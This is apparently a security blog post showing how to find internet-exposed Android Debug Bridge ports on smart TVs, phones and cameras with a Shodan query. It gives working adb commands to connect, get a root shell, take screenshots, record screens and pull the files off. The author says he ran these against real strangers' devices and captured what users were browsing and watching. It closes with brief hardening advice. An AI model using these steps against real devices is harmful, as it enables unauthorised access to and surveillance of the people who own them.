# Getting Shell Access to ADB Exposed Smart Devices 📲📺⌚ ### Introduction ADB is being used widely by android community developers to debug android apps and perform several other tasks such as to push/pull files between android & pc, install applications, enabling/disabling verity checks, execute commands, rooting device, etc. I love CLI so I prefer using CLI commands over UI and ADB provides me shell access where I can run commands. It also has feature to expose TCP port allowing users to connect over LAN, but what if this local port is somehow exposed to the Internet allowing anyone to connect to the device via exposed adb port *5555* . Since Android is an open source project, most of the companies create their custom version of android images which drive their products. There are high chances that smart device is running android or its variant, supporting ADB connection. Can a malicious user connect to such exposed device?? ### Using Shodan To Find Exposed Devices #### Finding devices using search ``` https://www.shodan.io/search?query=%22Android+Debug+Bridge%3A%22 ```

History of Devices with Exposed ADB port over the Internet

There are several devices connected to the Internet with exposed ADB port. Most of these devices are misconfigured allowing anyone to connect to these devices. ### Installing ADB Tools For Connecting To A Remote Device #### Install adb tools on debian based distro ```bash $ sudo apt install android-tools-adb -y ``` #### Start server and connect to device ```bash $ adb start-server # adb connect [IP]:[PORT] $ adb connect [TARGET_IP]:5555 # list devices $ adb devices List of devices attached [redacted]:5555 device ``` {% hint style="info" %} Some devices don't accept connection. Try another IP if you're unable to connect to the device. {% endhint %}

I successfully got shell access to one of the exposed device. Getting a shell access is one of the basic step for pivoting, attacker once gets shell access they usually try to privilege escalate the device then try to compromise other devices on the network. Attacker still can damage the system by uploading malicious/spyware application. As PoC I'll be capturing user's screen using shell access. Let's try to find rooted devices on the Internet. Rooted devices provides complete control over the device to the attacker.

# connecting to target machine
$ adb connect [TARGET_IP]:5555

# enabling root on machine
$ adb -s [TARGET_IP]:5555 root

# getting root shell access to the device
$ adb -s [TARGET_IP]:5555 shell

Got Device with Root Access:tada: ### Capturing Screenshots and Recording Screen #### Capturing Screenshot and Storing on Attacker's machine ```bash $ adb -s [TARGET]:5555 exec-out screencap -p > screen.png ``` {% hint style="info" %} Image will be stored in current directory as *screen.png* {% endhint %} #### Capturing Screen and Pulling File on Local Machine

# capture screen for 10 seconds 
$ adb -s [device_ip]:5555 screenrecord  --time-limit 10 /sdcard/recorded.mp4

# download file
$ adb -s [device_ip]:5555 pull /sdcard/recorded.mp4

# delete file
$ adb -s [device_ip]:5555 shell rm /sdcard/recorded.mp4

{% hint style="info" %} Above commands will capture screen for 10s, download file to local machine in current working directory then delete file. {% endhint %} #### Using Above Commands and Capturing Screenshots

Captured Screenshot of User Browsing Internet

Above images are captured from devices exposed to the Internet and using ADB to get access where user's are browsing web, watching shows, playing games, etc. But I encountered a ransomware infected machine asking victim for $100 to bitcoin address.

Encountered an Ransomware Infected Machine

Enlarged Image of Ransomware Infected device

Since, ADB port is exposed to the internet anyone can connect to the device over the internet and install ransomware application. On searching for ***Nanoware Ransomware*** I couldn't find any traces of such ransomware over the internet. Though we cannot trust messages saying that "*SORRY I have to feed my family*", since it could be social engineering technique luring victim into paying low value ransom. But I think this attack isn't carried out by a ransomware gang but it should be an individual or it could be initial stage of the gang experimenting something. ### Conclusion There are several devices connected to the internet with their adb exposed to the internet allowing attacker to connect, execute commands, installing applications, capturing screen, etc. Among which most of the devices included Smart TVs, Smart TV boxes, Smart phones and Smart Cameras. Users should close their adb connection after usage. Devices with adb port open shouldn't be exposed to internet, individuals should use VPN network such as wireguard/openvpn to create a secure network and connect to the device remotely.